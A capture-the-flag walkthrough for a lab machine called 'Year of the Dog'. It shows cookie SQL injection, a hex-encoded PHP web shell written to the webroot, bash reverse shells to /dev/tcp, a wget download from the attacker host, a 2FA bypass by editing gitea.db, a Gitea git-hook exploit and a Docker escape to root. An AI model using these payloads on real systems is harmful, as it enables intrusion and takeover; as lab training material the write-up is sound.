Machine URL :: Year of the Dog


Nmap scan: nmap -p- -vv <MACHINE-IP> -oG initial-scan

22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63

SSH on port 22 and webserver on port 80 as usual.


Hello Friend

I used gobuster for any hidden directories but got nothing.\


Using burp , we see there is a cookie being stored. We could do some injection with the cookie.

Hello Friend

This confirms that SQLi is the way to go. UNION SELECT works.\

Cookie: id=6957bbd77dec77da95bbe62b24d2a92f' UNION SELECT 1,database() -- - 

gives databse webapp

Hello Friend
UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema='webapp' -- -

gives table queue

UNION SELECT 1,group_concat(column_name) FROM information_schema.columns WHERE table_schema='webapp' and table_name='queue'-- -

gives 2 columns : userID and queueNum

Seems like we can even write to webroot using : INTO OUTFILE '/var/www/html/

UNION SELECT 1,'testing' INTO OUTFILE '/var/www/html/test.txt'-- -

gives :
Hello Friend

Using Command :

UNION SELECT 1,LOAD_FILE('/etc/passwd') -- -

we got 1 user:


As RCE detection is triggered by <? we’ll have to hex encode our payload and then pass it through SQL unhex function.

UNION SELECT 1,UNHEX('3C3F7068702073797374656D28244745545B27636D64275D293B203F3E') INTO OUTFILE '/var/www/html/cmd.php' -- -

Now if it works:

Hello Friend

It works! \


Now to move in , save this :

bash -i >& /dev/tcp/<IP Address>/<PORT> 0>&1

to a file and transfer it to the webserver using :

<MACHINE-IP>/cmd.php?cmd=wget <YOUR-IP>:<PORT>/<file>
Hello Friend

You should be in:

Hello Friend

We are www-data. There is the user flag in dylan’s home directory but we don’t have the permission to read it. We can read the work_analysis file though. In there we find Dylan’s SSH password.

Hello Friend


Hello Friend

Using ifconfig, there seems to be a docker address. We don’t seem to be in a container so probably that will come later.

Hello Friend

Using LinPeas , we find /app/gitea/gitea web process running under dylan. Also that localhost is available on port 3000.
Let’s use SSH port forwarding and check out that port
ssh dylan@<MACHINE-IP> -L 3000:localhost:3000

Hello Friend

Signing in as dylan we get a 2 factor authentication.

Hello Friend

Going back to dylan, checking gitea we find a db: gitea.db which is an SQLite3 database.

Hello Friend

Let’s delete the two_factor table from gitea.db:

Hello Friend

And we’re in:

Hello Friend


Now searching for any Gitea version 1.13.0 exploits , I found CVE-2020-14144 exploit.
In the Test-repo, we go to settings > Git Hooks > Post Recieve Hook. In this hook , we can write a shell script that will get executed after getting a new commit.

Add bash -i >& /dev/tcp/<YOUR-IP>/<CHOSEN-PORT> 0>&1 to Post Recieve Hook and update it.
Start a netcat listener, then on your local machine :

git clone http://localhost:3000/Dylan/Test-repo.git
cd Test-repo
echo "something" >>
git add
git commit -m 'RCE'
git push
Hello Friend


Now , we’re in the container confirmed by the .dockerenv file in / and we gotta break out. We can su rightaway.

Hello Friend

Check the /data/ directory as the files are usually mount to host.\

This is the case here as well as the files in /data are identical to the /gitea directory in Dylan’s shell.
Now just transfer the bash file located in /bin/ to /data/ and add the permissions.

Hello Friend

Back at Dylan’s: run ./bash -p and you got root.

Hello Friend